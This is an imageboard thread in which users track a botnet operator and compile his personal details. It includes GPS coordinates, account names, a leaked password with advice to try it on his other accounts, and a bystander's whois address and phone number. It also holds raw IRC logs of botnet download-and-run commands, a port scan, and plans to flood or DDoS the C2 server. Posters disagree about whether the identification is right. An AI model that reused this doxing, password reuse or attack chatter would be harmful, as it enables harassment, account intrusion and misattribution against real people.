so a finnish guy brought the malware from hackforums?

>>24452428
>sells credit cards harvested by his botnet
>.NET
>implying webinjects are possible in .NET

AHAHAHAHAHAHAHAHAHAHAABAHAHAHAHAHAH OKAY

He might have brought himself a copy of Citadel/Spyeye then maybe he could have but it very highly unlikely that he did.

>>24452486
OH GOD HAHAHAH


>>24452502
>elite .NET hacker
>facebook

Please please please link, I want to know what he looks like!

>> No.24452517

>>24452502
link it.

>> No.24452525

Is anyone going to forward this anywhere that it'll actually get attention?

>> No.24452541

>>24452494
Pretty much everything here.
http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html

>> No.24452543

>>24452525
i'll make an irc flooder script and i'll make a /b/ thread probably

>> No.24452559

i know him hes an hf skid

>>24452211
address
http://regex.info/exif.cgi?imgurl=http%3A%2F%2Fimg707.imageshack.us%2Fimg707%2F2923%2Fimg0617hz.jpg
http://maps.google.com/maps?f=q&q=loc:34.196167,-118.848667&t=k&spn=0.5,0.5

also youtube accounts
http://www.youtube.com/user/bmjslider
http://www.youtube.com/user/LegendBV1

>> No.24452579

http://www.threatexpert.com/report.aspx?md5=fc6de99a7ecb826eebef7fa0d3ec31bd

look at the outbound data
looks like it's relevant to licensing the bot

>> No.24452603

>>24452514
>AHAHAHAHAHAHAHAHAHAHAABAHAHAHAHAHAH OKAY
I don't see why you would overreact like this, it is very plausible. You don't actually need to do webinjects to capture credit cards.

see
>>24452390
They normally buy stuff like this with stolen credit cards, I don't see why you are so quick to disprove my suspicions, I just came to this thread and you're acting like a fag.

>> No.24452708

>>24452603
I was making fun of the fact that it was in .NET, I should have been more clear.

I can feel your butthurt. Its okay, you were wrong.

They CAN buy stuff like this with stolen credit cards but they don't, let me tell you why:

-.NET malware comes with password getters, you know when you store your password in Chrome/Firefox, they send all of that to their server.

>Look for runescape.com
>find few thousand accounts
>steal gold

That's all. I can guarantee you that anybody looking to steal CVV will not be using anything thats .NET

>> No.24452710

Send this faggot's dox to the FBI. Seriously.

>> No.24452723

>Well accomplishments... avoiding any major downtime from the cops hitting bshades.com was nice.
Apparently the cops are already trying to take down Blackshades. They'd actually go after this fag.

>> No.24452725

>>24452710
Already done.

>> No.24452738

>>24452723
http://thehfnews.blogspot.com/2012/02/113011-hf-news.html
>Michael Westen: Interesting - It's always interesting to learn why people pick their name. I picked mine because it was the main character on my favorite TV show. What inspired you to start [censored]?
>Orgy: Actually, BV1 started it. He built up the site and everything and then showed it to me. I figured it was a good idea, and passed it on to Lith in IRC. He advertised it on HF and it immediately gained a lot of popularity.

Can you guess what censored is? Protip: It's blackshades.

>> No.24452758

>>24452525
>>24452543
don't bother with a /b/ thread. if you do make one, simply make a thread linking to this one, saying the person responsible for the spam has been doxed. /b/ threads disappear too fast.

>>24452559
this guy leaves more tracks than a fucking tractor.

Emails so far:

[email protected]
[email protected]
[email protected]

AIM: Neu Army1

lancerimpact.dyndns.info he uses this as a personal server. Or at least he used to.

A password he used on a booter forum or something that was cracked when the db was dumped: byas40pz

Try that byas40pz pass on some of his accounts. It looks random and specific to that site but who knows.
He also has a huge number of domains.

Anything with "terror-squad" in it (.co, .info, and more)
Anything with "bv1" in it
thu.gs
some booter shit

He's got lots of usernames, accounts, and profiles. He loves Runescape. He loves hanging out on Runescape IRC servers. He loves scamming Runescape items and accounts. He's probably scammed real money as well.

I'll compile a full and complete dox later today.

>>24452710
We are. I'm not a narc but this guy is spamming 4chan and is a fucking idiot, so fuck him.

>>24452723
HAHAHA. I can just imagine the smile on a cybercrime unit cop's face after he reads this thread. It's like delivering glazed fucking donuts right to their doorstep. They don't even have to do any work.

>> No.24452763
File: 21 KB, 955x764, oh god im going to get heckered.png [View same] [iqdb] [saucenao] [google] [report]
24452763

oh god why did I do this

>> No.24452773

>>24452758
Moot removed limit on threads

>> No.24452774

>>24452763
Just use a proxy. Even Tor isn't blocked.

Btw, the others in the room are invisible.

>> No.24452784

Also, note:

Johnston has probably seen this thread by now. So keep that in mind.

>> No.24452812

I'm thinking about flooding his IRC with "Install Gentoo"

>> No.24452815

>>24452579
That's a blackshades connection. Just info from the infected computer.

>> No.24452820

>>24452784
you think he browses /g/?

>>24452758
>HAHAHA. I can just imagine the smile on a cybercrime unit cop's face after he reads this thread. It's like delivering glazed fucking donuts right to their doorstep. They don't even have to do any work.

hope whoever reported this linked to archive and not live 4chan

>> No.24452842

>>24452820
if the thread 404's, you are being redirected to the archive anyway

>> No.24452843

>>24452812
use the stallman interjection
it uses more bw

>> No.24452849

>>24452820
I doubt he browses /g/ but someone's probably linked it to him by now, either an acquaintance of his trying to help him (he's kind of a big deal on Hackforums, you see. ahahaha.) or someone trying to fuck with him and scare the shit out of him.

>> No.24452856

>>24452842
not automatically, unless you think the cops will have 4chan x installed, in which case, yeah, they will be redirected.

>> No.24452865

>>24452812
>>24452843
>use the stallman interjection
also use linus torvalds response to that.

>> No.24452876

>>24452856
Someone should just ctrl+S this thread or even send the plaintext to a few different California law enforcement agencies. Local police as well as the nearby FBI branches.

>> No.24452889

>>24452865
it has to conform to the irc protocol so multiple messages would need to be sent

>> No.24452893
File: 318 KB, 1600x1200, DSC1100.jpg [View same] [iqdb] [saucenao] [google] [report]
24452893

We're onto you, son.

>> No.24452897

If you did all that digging yourself, you could've extorted the fuck out of him by now.

>> No.24452914
File: 329 KB, 1680x1050, 1322682803891.png [View same] [iqdb] [saucenao] [google] [report]
24452914

>>24452893
Yeah, that's old as fuck.

>> No.24452915

>>24452897
/g/ is not 1 person

>> No.24452926

>>24452897
It was a group collaboration.

Also, extorting money out of a criminal is a bad idea. And will probably result in you getting shit from police later on. Someone could've maybe intimidated him into giving more info I guess. Too late now though.

>> No.24452929

>>24452897
why ?

>> No.24452934
File: 82 KB, 949x539, trolling.png [View same] [iqdb] [saucenao] [google] [report]
24452934

>>24452893
Before anyone gets too excited, it's a troll, old pic.

>>24452897
>try to extort someone who is likely in league with eastern Europeans, can't go to cops without crime coming out if they come after you

>> No.24452947

>>24452926
>extorting money out of a criminal is a bad idea

They can't exactly go to the police over it.

>> No.24452948

cant see no bots in there

>> No.24452951

>>24452893
GPS Latitude Ref North
GPS Longitude Ref West
GPS Longitude 76.771650 degrees W
GPS Latitude 39.108733 degrees N
GPS Position 39.108733 degrees N, 76.771650 degrees W
Modify Date 2012:04:21 10:15:02.792
4 days, 2 hours, 30 minutes, 47 seconds ago
Thumbnail Image (4,917 bytes binary data)


at least you tried

>> No.24452955

Why don't you all just make a channel in his IRC server to discuss faster.

>> No.24452964

Hey I'm in college for Computer Forensics, this could make a decent capstone project for me to submit later on.
May I offer my services in computer auditing OP?

>> No.24452967

>>24452947
they don't have a reason to believe you won't go to the cops anyways
you become a loose end

>> No.24452969

>>24452876
not saving the entire page with screengrabber

also this is going to the archives wether you like it or not

>> No.24452978
File: 25 KB, 500x311, 1331502924881.jpg [View same] [iqdb] [saucenao] [google] [report]
24452978

>>24452955
That's like pissing a liosn mouth mate.

>> No.24452989

>>24452964
He'd be able to read the logs of the channel, which is probably not a good idea.

If you guys really want we could start a chat on Rizon or something.

>> No.24452998

>>24452989
why not make it invite only with hostmasks on?

>> No.24453010

Oh one tip:
Try not to spook the guy. If he has any sense of paranoia, first thing he'll do is SHUT DOWN EVERYTHING.
Least that's what I'd do.

>> No.24453024

>>24453010

topic channels changed, he already knows.

>> No.24453042

>>24453010
it's already being broken down as we speak
that ircd is barren

>> No.24453043

>>24453024
Oh well too late.
Goodbye physical evidence.

>> No.24453057
File: 16 KB, 250x242, msdigcrimesunit.jpg [View same] [iqdb] [saucenao] [google] [report]
24453057

>>24451377
>is he going to get in legal trouble or are people just gonna order pizza to his house?

get v& by the Microsoft Active Response for Security (MARS) team

>> No.24453062

>>24442662
Was that the file2.exe thing? Someoen already posted the C# code at one point.

>> No.24453073

file2.exe appears to be an updated version of Insomnia.

I'm not sure why he seems to be switching between Blackshades and Insomnia.

>> No.24453093

>>24453043
He doesn't even control the server he's on, it's in fucking Europe. There are probably backup tapes since it's a shared host.

>> No.24453121

>>24453024
I'm still in chat and haven't seen any changes.
(10:48:00 AM) The topic for #BV1 is: d3F6Q29zTyt3Nm5EcmNPb3dxekRwTU80dzdqRHZNSzJ3cVBDbzhPN3c3dkR1OEtpdzdqRHFjTyt3NzdEbzhPK3dxSER2OE85dzdu
RHJjT293cUxEcjhPandxUER1TU9qdzd6RHBjT3Z3cUxEdU1PMHc3akRzQT09fDk5ODYzMTQw
(11:06:33 AM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(11:36:33 AM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(12:06:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(12:36:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(1:06:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(1:36:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(2:06:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(2:28:44 PM) You are now known as [CENSORED]
(2:36:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(3:06:32 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(3:36:32 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(4:06:32 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(4:36:32 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe

>> No.24453142
File: 27 KB, 265x150, DCU_Botnets.jpg [View same] [iqdb] [saucenao] [google] [report]
24453142

>>24452000
No one is outside Microsoft jurisdiction.

"Project MARS is a joint effort between the Microsoft Digital Crimes Unit, Microsoft Malware Protection Center, Customer Support Services and Trustworthy Computing. Recent examples of MARS include: Operation b49 (the Waledac takedown), Operation b107 (the Rustock takedown) and Operation b79 (the Kelihos takedown). "

https://www.microsoft.com/government/ww/safety-defense/initiatives/Pages/dcu-economic-crime.aspx

>> No.24453154

meh nothing will happen, except buy new servers.

>> No.24453178

>>24453121
The only topic that has changed is the one in #b8896

(4:22:31 PM) The topic for #b8896 is: ellUTmlzeVJ6SmZNaHMyRXpJdk1pc3lZfDQyOTUxODY4
(4:24:19 PM) mode (+b *!*[email protected]*.8817CC10.22486F08.IP) by b
(4:32:27 PM) mode (+b *!*[email protected]*.hsd1.tx.comcast.net) by b
(4:32:38 PM) mode (+b DrMolesto!*@*) by b
(4:32:54 PM) mode (+qo b b) by ChanServ
(4:34:28 PM) b has changed the topic to: ellUTWpzeU16SVBNZ015T3pJL01nOHlBekkvTWc4eU16SS9NZ015RHpJek1qOHlBeklQTWpNeVB6Smc9fDQyOTUxODY4

>> No.24453185
File: 161 KB, 1366x658, faggot.jpg [View same] [iqdb] [saucenao] [google] [report]
24453185

I cried laughing sending him this.

>> No.24453186

>>24453142
Seriously, those guys are in deeper then any other investigation unit.
I wonder if they use windows or an adapted linux.

>> No.24453191

>>24452989
Well I'm down if you guys want to start a channel.

I would need all the information there is available right now, that can be discussed later though.

[email protected] if you need any help

>> No.24453192

I'm gathering information about the websites you gave out guys.

thu.gs - 80.82.64.71

Located in the Netherlands.

ISP is the Ecatel Network.

Ports open: 21 (ftp)
25 (smtp)
53 (domain)
80 (HTTP)
110 (POP3)
8080 (http proxy)

>> No.24453194

>>24453178

what the hell does it mean

>> No.24453209

>>24453194
Botnet commands?

>> No.24453212

>>24453192
Could be an offshoot of the gone bad division of what was anonymous in the lower countrys.

>> No.24453216

>>24453154
The payment info, etc. are all tied to him. Plus now that his ID is known it's most likely probable cause for ISP logs and such.

>> No.24453239

>>24453194
It's not base64 or rot13

shit, that's all I know.

I'm just sitting in this thread googling all the vocabulary.

>> No.24453255

oh god im scared to join the channel

some take screenshots

>> No.24453288

>>24453194
The L33T topic encryption. Just run the bot in a vm and sniff it to see what sites it visits and what files it downloads.

>> No.24453307
File: 79 KB, 1331x605, afsfd.png [View same] [iqdb] [saucenao] [google] [report]
24453307

>>24453255

>> No.24453309

>>24453212

Or a European being a little script kiddie.

>> No.24453312

>>24453255
you don't join the channel with out a VPN or proxy.
Even he made a botnet wich i highly am starting to doubt seeing his weak ass protection of send locations, you're perfectly fine with a proxy.

I don't think the people who made it are in the channel.

>> No.24453320

>>24453178

A lot of the old topic is still in the new topic. Wonder if its just a simple XOR based encryption. Yeah, that was me that got banned twice. I was sitting in the channel for 4 hours doing nothing. I went onto a proxy with the same name and got banned again within a few sec of joining so someone is actively looking at that channel.

>> No.24453328

>>24453307
>install gentoo
HAHAHA

>> No.24453330

>>24453309
Any idea on server where abouts, i could visit is only a few hours from me.

>> No.24453347
File: 2.90 MB, 290x189, 1318650104775.gif [View same] [iqdb] [saucenao] [google] [report]
24453347

>ellUTWpzeU16SVBNZ015T3pJL01nOHlBekkvTWc4eU16SS9NZ015RHpJek1qOHlBeklQTWpNeVB6Smc9fDQyOTUxODY4

>> No.24453350

>>24453330
Talking to ISP is also an option.

>> No.24453354
File: 68 KB, 677x721, dammit.png [View same] [iqdb] [saucenao] [google] [report]
24453354

>>24453328
>That feel when you get banned

>> No.24453364

Guys do not join without a proxy.

>> No.24453377

>>24453364
Why not?

>> No.24453380
File: 65 KB, 505x506, madness.png [View same] [iqdb] [saucenao] [google] [report]
24453380

>>24453255

>> No.24453386

>>24453377
Aggravating skiddies is just generally a shitty idea.

>> No.24453391

>>24453354

looks like b is the one whos watching and will tell the other guy

mother fucker

>> No.24453401

>>24453354
#lamers is a better place for you ?
This ain't hackers with angelina jolie, jesus.
No way in hell this guy made a botnet.

>> No.24453403

>>24453380
poor debbie ;____;

>> No.24453415

>>24453401

It's a standard kick message.

>> No.24453436

>>24453380
Oh wow! Richard Stallman is fighting for our freedomz!

>> No.24453446

>>24453403
Well atleast we have a decent example in the pic.
>>24453415 i just get "your banned".

>> No.24453478

>>24453401
protip: its not hard.

>> No.24453479

nothing i hate more then bot masters.

troll them two fuckers

>> No.24453499

What's the mIRC again? I tried we.be.thu+443 but the server is down I think.

>> No.24453504

Why not take over the botnet and use it to spam Stallman interjections all over the internet?

>> No.24453509

>>24453499
did you include the .gs?

>> No.24453517

Someone PMed me. I'm richard stallman teehee

>> No.24453530

>>24453330

See: >>24453192

>> No.24453533

>>24453517
ahahahaha
what did they pm you?

>> No.24453542
File: 41 KB, 647x688, saddsasafdf.png [View same] [iqdb] [saucenao] [google] [report]
24453542

>>24453533

>> No.24453555

>>24453517
gentoo is an enemy of your freedom, just thought id let you know.

>> No.24453580

>>24453509

Yeah, I get a cannot connect. Maybe he's on to us?

>> No.24453603

whatever you are going to do with their IRC
DO NOT link them here. just in case they don't know yet

>> No.24453617

>>24453580

The b guy is the active one in the server and banned me, i guess he knows and is passing it on.

>> No.24453618

>>24453603
I will not link them here.

I'm just fucking with them.

>> No.24453623

>>24453580
we.be.thu.gs port 443

>> No.24453659

Their bot seems to have a nice internet connection
([email protected])

>> No.24453674

yeah IRC works fine but you have to connet to the right port

/server we.be.thu.gs:+443

>> No.24453682

>>24453659
>lsanca.fios.verizon.net

lol mini data center in the botnet

>> No.24453702

>>24453504
Thanks, seems to be an outsourced server to one of the bigger ISP's.
ECatel isn't that well known, and seems to relate to http://alibabahost.com/.

and for some reason the host on the 80.82.64.71 ip is called www.wrestling2watch.com, and it seems the url is to large for the server or my proxys screwing up again, could be because of the encryption.

>> No.24453721
File: 62 KB, 666x647, #us.png [View same] [iqdb] [saucenao] [google] [report]
24453721

Everyone get in #US

>> No.24453733

>>24453721
Hahahah...

>> No.24453757

>>24453733
/exec -o cat /dev/urandom

>> No.24453768

>>24453623

we.be.thu.gs+443: Could not resolve hostname.

>> No.24453778

first server i have seen in a while to be using SSL, cant sniff the server.

>> No.24453792

>>24453768
forgot the :

>> No.24453801

lol I don't even know how to move rooms in IRC, how do I get from the main room to #US?

>> No.24453810

>>24453801
type /j #us

>> No.24453813

>>24453768
>+
:

>> No.24453820

>>24453801

You shouldn't be in it in the first place.

>> No.24453866

>>24453702


I'll start scanning ip addresses. Let me look at:

__ _ ____
| \ | | __ _ _ __ ___ ___ / ___|___ _ __ ___
| \| |/ _` | '_ ` _ \ / _ \ | | / _ \| '_ ` _ \
| |\ | (_| | | | | | | __/ _ | |__| (_) | | | | | |
|_| \_|\__,_|_| |_| |_|\___| (_) \____\___/|_| |_| |_|
On a first name basis with the rest of the world.


Get your <a href="http://www.name.com">domains</a> at Name.com.


Domain Name: alibabahost.com
Registrar: Name.com LLC

Expiration Date: 2015-08-08 11:59:53
Creation Date: 2009-08-08 11:59:53

Name Servers:
ns1.alibabahost.com
ns2.alibabahost.com

REGISTRANT CONTACT INFO
Green Apples Software & WebSolutions Pvt Ltd.
Anurag Mishra
F2, NO-30,ITI Layout
New BEL Road
Bangalore
Karnataka
560054
IN
Phone: +91.9741887870
Email Address: [email protected]

ADMINISTRATIVE CONTACT INFO
Green Apples Software & WebSolutions Pvt Ltd.
Anurag Mishra
F2, NO-30,ITI Layout
New BEL Road
Bangalore
Karnataka
560054
IN
Phone: +91.9741887870
Email Address: [email protected]

>> No.24453870

>>24453757
thanks.

>> No.24453881
File: 50 KB, 616x668, 9fag.png [View same] [iqdb] [saucenao] [google] [report]
24453881

Am I doing it right?

>> No.24453897

>>24453866
I got to that but it stops, right there.
Although it's funny, it must a very small company.

>> No.24453899

>>24453813

Hmm...

we.be.thu.gs: Terminated

>> No.24453903
File: 763 KB, 1024x768, Koala.jpg [View same] [iqdb] [saucenao] [google] [report]
24453903

I can guarantee server will still be up, it seems like it's the first time /g/ has seen a botnet.

>> No.24453925

>>24453903
I have never seen one, just a few keyloggers and normal destory and send virusses.
This is new.

>> No.24453929
File: 98 KB, 531x787, EXT4D_Exterminator.jpg [View same] [iqdb] [saucenao] [google] [report]
24453929

someone called?

>> No.24453974
File: 38 KB, 510x507, 1337hax.png [View same] [iqdb] [saucenao] [google] [report]
24453974

They're going to wonder why they have 10000000 page long logs of this

>> No.24454005

>>24453974

bv1 channel is unsecured compared to the other.

>> No.24454020

holy shit. is it just me or is the server lagging like hell?
recieved a ping request about a minute later

>> No.24454039

>>24454020
Wich, we have a crazy total ?

>> No.24454061

>>24454005
Ofcourse, the blackshades is just a gathering site.
You didn't expect a control center to have an open door did you ?

>> No.24454093

I can't get on to this with a the amount of proxies I've tried - what is everyone else using?

>> No.24454097

>>24453499
>What's the mIRC again?
>mIRC
Oh, nevermind, I'm talking to a tripfag.

>> No.24454102

So has the joke died down yet or is it all that's remaining? Did we find out anything new?

>> No.24454125

>>24454093
VPN

>> No.24454152

>>24454093
vpn and a proxy. should be enough for this shit

>> No.24454159

>>24454093
TOR browser

>> No.24454188

>>24454159
I totally forgot about that, though reading it in an earlier post
>>24454152
>>24454125
I'm not going to pay for a vpn, just to piss someone off

>> No.24454217
File: 43 KB, 491x574, spam.png [View same] [iqdb] [saucenao] [google] [report]
24454217

/g/, the kings of spam

>> No.24454221

anybody registered for HF who can tell us what BV1 posted in this thread?

or if he knows yet?

>> No.24454224

Who is always posting this? >>24453157

>> No.24454287

>>24454102
To this point we got :
-His alias (Blackshades (red flagged by a governement) method of typing confirms his gender as male, we also have knowledge of a second person in the IRC).
-His IRC
-His method
-His official ISP
- Several Old emails and an AIM, old server. (see >>24452758)


About him :
-Script kiddie level (no acknowledged person would have left the IRC open with this simple a password, he even didn't talk to us on IRC)
-Runescape lover/scammer (his age can range from 15 - 30, near the earlies years, seeing his obsession with status on "blackshades").
-Seemingle either from canada (if he was dumb enough to use an accustomed mail provider when he first started, or lives in the netherland, (ISP location of a server)).
-The site and himself probably are redflagged and could be taken down without to much fuss from any governement.

----
Anyone have something to add ?

>> No.24454311

>>24454224
Not related although same method of spam.

>> No.24454315

Meh, when he was getting fixed, and we were going down the rabbit whole, this was fun.

But now that school is out and the toddlers are filling his logs with bullshit, this is now a possibly cool experiment gone sour.

Attribution may very well become impossible, because god knows what the botherder is going to do to change things up.

We lucked out because he had dated models, botnets aren't controlled via IRC anymore. We could have tried to get a bit further with where he was receiving the insomnia code from, hooked that to more shit... Then just lay waste to it all or get LE involved and watched the unraveling.

tl;dr - op delete the thread and wait u til the murricans are asleep again please.

Also, he's using dropbox. You can find the rest of his files on each dropbox acct if you try.

>> No.24454316

>>24454287
He lives in california, we have his address.

>> No.24454336

>>24454316
Proof of find ?
No doxing without telling.

>> No.24454341

>>24454315
>dropbox
Does he have a Public folder!

>> No.24454349

>>24454336
here!
>>24451431
>>24452559

>> No.24454367

>>24454336
see >>24451329
more on what lead up to that above ITT

>> No.24454385

BV1 from HF today
>Considering HackForums pays for my life (apartment, car, insurance, and spending money) and I just spent my last weekend out of town with friends
Seriously lolskiddie.

>> No.24454396

To this point we got :
-His alias (Blackshades (red flagged by a governement) method of typing confirms his gender as male, we also have knowledge of a second person in the IRC).
-His IRC
-His method
-His official ISP
- Several Old emails and an AIM, old server. (see >>24452758)


About him :
-Script kiddie level (no acknowledged person would have left the IRC open with this simple a password, he even didn't talk to us on IRC)

-Runescape lover/scammer (his age can range from 15 - 30, near the earlies years, seeing his obsession with status on "blackshades").

-Place of residence : California (see >>24454316
>>24454349 (and >>24451431,>>24452559)


-The site and himself probably are redflagged and could be taken down without to much fuss from any governement.

I'll incorporate the house number later.

>> No.24454492

>>24454396
Should we finalize a premature Dox ?

>> No.24454545

>>24454492
>>24454396
>>24454336
>>24454341

Delete the thread, the kids have taken over.

>> No.24454549
File: 55 KB, 663x645, RIP.png [View same] [iqdb] [saucenao] [google] [report]
24454549

R.I.P Botnet. It was fun <3

>> No.24454552

>>24454492
Do it.

>> No.24454564
File: 133 KB, 990x611, 1323809166067.jpg [View same] [iqdb] [saucenao] [google] [report]
24454564

>>24454545
No, you old partay poopa.

>> No.24454650

>>24454564
Collecting a bunch of information gathered by other people is hardly a 'party'. I know skids always have to smear their shit on everything.

>> No.24454684

>>24454650
you seem quite upset

>> No.24454734

Grabbed more or less everything from the thread. Someone else can format it nicely.

http://pastebin.com/xpB4euv1

>> No.24454761

>>24454549

Well, this server has a lot of active ip address on it. The Netherlands one. I'm going to go through that server tonight and see if I can't dig up anything.

>> No.24454762

>>24454684
>lulz we compiled the official dOxX
>we hackers now
>u mad?

>> No.24454775

>>24443266
>>24443266
>>24443266
>>24443266


where does this one connect to? i cant find anything.

>> No.24454791

>>24454762
do you see the word ``hacker'' in here?

>> No.24454822

>>24454650
>>24454564
>>24454492
I don't see why this is a problem.

His intention of compiling the results on a pastebin is preferred to having some anons repost random bits repeatedly, which in turn refer to other repostings.

Organization.

>> No.24454837

highly doubt its his dox.

>> No.24454873

PLEASE READ:

How about we regroup around 11 pm EST on /g/ and we'll collaborate again and see what we have come up with.

Cool guys?

>> No.24454876

>>24454837
have you read some of his posts? He really is that dumb.

>> No.24454899

>>24454876

Still don't believe it, i know for a fact alot of node owners use other peoples personal info when registering.

If it was his, and he was worried the server would be down and the domain gone.

>> No.24454900

>>24454791
No, but your willingness to compile "teh official dox" is a testament to your skid shit, the necessary information has been forwarded to the authorities already, you're only trying to turn this into some kind of skiddie war, THIS WILL eventually end up on /b/. Stop fagging this shit up.

>> No.24454905

>>24454791
The only thing any of us have been doing the whole time, is just falling down the rabbit hole.
And getting further to something interesting by doing nothing special, the most anyone here did was read into the original EXE.

>>24454837
Me to.

Noway in hell he had his real name on a whois owner of a server.

>> No.24454916

>>24454876
Or he's pretending to be that dumb; not a bad move if you can afford it. I'm not sure, it could be either.

>> No.24454936
File: 1.01 MB, 312x176, 1332594294854.gif [View same] [iqdb] [saucenao] [google] [report]
24454936

>>24454900

>> No.24454966

>>24454899

Also the c&c server was posted weeks ago, and it's still going and stronger, recruiting more bots everyday after being reported to the authorities and nothing has happened.

I am starting to think /g/ is retarded and filled with kids who get a boner over a botnet.

>> No.24454970

>>24454936
lulz xD

>> No.24454982

>>24454916
Hold against him that he wrote a hacker GUI in Visual Basic. Even if that was a scam.

>> No.24454988

Can't we just DDoS the C2 server? From what I gather he's using a centralised IRC. LOIC TEIM!?

>> No.24454992

>>24454899

I'm trying to take this shit down. Fuck him.

>> No.24455008

You better start believing in botnets, BECAUSE YOU'RE IN ONE

>> No.24455014

>>24454988

The irc server is probably on a 1 or 2gb/s line.

>>24454992

Enjoy wasting your time.

>> No.24455040

>>24455008
Out this december, starring brendan johnston and Robert Mueller.

>> No.24455052

>>24455014
you obviously don't understand what DoS is
it's not just about bw

>> No.24455053

>>24454992
>Can't even tell the difference between IRC and mIRC
>tries to take down a host

>> No.24455067

>>24455052

If you don't have a botnet, you won't touch the server.

take your loic and go back to /b/

>> No.24455077
File: 169 KB, 856x362, the code.png [View same] [iqdb] [saucenao] [google] [report]
24455077

>>24454992
>>24455053
Sorry, but this.

Pic related.

>> No.24455082

>>24455052
>>24455014
>>24454992
Now this is going places, good bye gentlemen.

>> No.24455135

>>24455053

Shut the fuck up.

>> No.24455136

>>24454992

>Says the person who can't even use IRC

>>24453768

>> No.24455140

The host allowing the botnet is corrupted, they have hosted alot, mainly malicious stuff.

>> No.24455177

>>24455136

Because I was using an online IRC client I've never used before.

>> No.24455195
File: 84 KB, 300x288, stop-sign1[1].jpg [View same] [iqdb] [saucenao] [google] [report]
24455195

>>24455177

>> No.24455200

>>24455177

I'll repeat dumbass, the server had 3k before it went down.

The line would easily be 1-2gb/s and even bigger, you wont touch it with LOIC.

You'd need a 2-3k botnet at least to reach that type of bandwidth.

Also has anybody got information on the other guy in the server.

>> No.24455260

>>24455200

I'm not talking about LOIC'ing it. No shit I wouldn't be able to touch it but there is ALWAYS a way.

>> No.24455269

>>24455260

What other way you spastic, you couldn't even join the server.

It took you hours.

>> No.24455277

iirc there is a big hole in anope
allows for reverse shell etc

>> No.24455295

>>24455140
You're probably right.


###WARNING###
Brendan is now clearly samefagging this thread. He's making it seem like the dox are fake, or of someone else.

They're fucking not. They're legit.

The email he uses everywhere is [email protected] BMJ, aka Brendan M. Johnston. Plus Brendan J is on fucking everything he's ever registered or posted. Plus he has posts going back 5 years ago saying his name is Brendan. Plus he's been proven to be fucking stupid.

THINGS PEOPLE CAN DO:

Report all of his domains to their respective domain registrars. Many have fake info, and many are hosting malware or botnet server.

ALSO, CONTACT HIS COUNTY SHERIFF'S DEPARTMENT:

http://www.edcgov.us/Sheriff/
http://www.edcgov.us/Sheriff/
http://www.edcgov.us/Sheriff/

You bug the FBI and local police enough, and they'll definitely start looking into him. Tell them he's responsible for owning and spreading various botnets, and owns the Darkshades malware.

Don't bother trying to DoS the IRC server; however, flooding it could be somewhat effective and will probably piss them off. Just be sure to use proxies.

Ignore all people in this thread saying the info is fake. They're all from Hackforums and are trying to protect their precious bots and their investment, or are Brendan himself.

>> No.24455332

>>24455295

You have no proof it's the info, all you did was check where it was registered which could easily be faked.

You also claimed to have gotten the dox minutes after the thread was posted, go watch your hackers film.

>> No.24455354

>>24455295

Saved. I will be doing this.

>> No.24455398

I got shit to do guys, Nice job everybody.

>> No.24455401

>>24455332
Some of the info was posted a week ago. It's super easy to post a email into google and see what comes up.
http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html

>> No.24455418

>>24455295
done.

>> No.24455423

>>24455401

And it's still up after how many reports, good job failing and collecting a fake dox.

>> No.24455459
File: 44 KB, 1129x763, Untitled.png [View same] [iqdb] [saucenao] [google] [report]
24455459

LOL do they browse /g/?

>> No.24455466
File: 60 KB, 378x301, 1319451299446.jpg [View same] [iqdb] [saucenao] [google] [report]
24455466

>>24455418
gtfo Brendan

>> No.24455513

>>24455423
>Expecting government to act quickly
2012

>> No.24455531

>>24455513

It's been weeks, retard.

Also the host could be bullet proof hosting or offshore so it will remain up.

>> No.24455533

>>24455332
Yes I have fucking proof, you god damn idiot.

Google '"[email protected]" "brendan"'
Google 'blade_v1per brendan'

Read this: http://s1.zetaboards.com/leader_bible/topic/801305/1/
Read this: http://www.xfire.com/profile/bladev1per/
Read this: http://forums.zybez.net/topic/1374304-exodus-second-birthday/

Look at all the results.

Go the fuck away, Brendan. Shouldn't you be busy finding a lawyer to hire?

>> No.24455552

>>24455533
>implying because you found his first name his dox is correct and not faked.

Good job.

>> No.24455586

>>24455423
Police aren't going to take down sites or arrest someone in the course of 6 hours, moron. Which is when the dox were first posted. Even if it takes them days or weeks, he (or perhaps you, lol) is going to be in deep shit.

>>24455552
Are you saying he's used a fake name for his email, all his business dealings, and every website he's ever gone on, since he was 16 years old?

Ok.

>> No.24455594

>>24455552
http://whois.domaintools.com/bv1.biz

>> No.24455604

>>24455594
see
>>24454899

>> No.24455606

>>24455531
>2003
MISSION ACCOMPLISHED
>2012
Still there

>weeks
>years

>> No.24455613

I'll repeat once more, Brendan and his skiddie cronies are samefagging this thread up. Ignore them and laugh at them.

>> No.24455626

>>24455613

No, but i am someone who follows botnets on a daily day, and what you spew is ridiculous at best.

You have been watching to many films.

>> No.24455658

>>24455626

I also follow botnets on a daily day. BV1 is in deep shit.

>> No.24455660

>>24455606
>implying it takes weeks for a host to suspend your domain
>implying they cant see the 30k bots straining the server and completing wasting bandwidth.

/g/ confirmed for linux kiddies who know nothing.

>> No.24455671

>>24455658

If you had his real info, maybe.

>> No.24455674

>>24455626
Then please perform your own investigation on this person and tell me what info you can confirm of his. And please tell us where you see any information that conflicts.

I've dealt with dozens of idiots like Brendan. "Hackers" who own shittons of domains who leave tracks everywhere. You either have no idea what you're talking about or you're spreading disinformation to help Brendan.

>> No.24455690

>>24455660
